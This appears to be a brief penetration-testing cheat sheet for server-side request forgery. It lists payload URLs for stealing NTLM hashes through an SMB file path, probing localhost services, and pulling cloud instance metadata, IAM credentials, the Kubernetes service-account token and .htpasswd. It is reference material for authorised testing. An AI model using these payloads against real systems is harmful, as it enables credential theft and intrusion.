SSRF

So many things!

If you've determined you can control server side requests, there are many things to ALWAYS check.

If it's a windows box, you may be able to steal NTLM hashes with file://///10.1.1.1/smb/file.txt. This does require FIVE FORWARD SLASHES sometimes!

Check for any other internal service which may be open on localhost only.

ftp://localhost
http://localhost:8000
http://localhost:8080

Try to find internal secrets or instance metadata!

http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/user-data
/var/run/secrets/kubernetes.io/serviceaccount/token

Check for any restricted pages which may show additional information to the server

http://localhost/.htpasswd

Last updated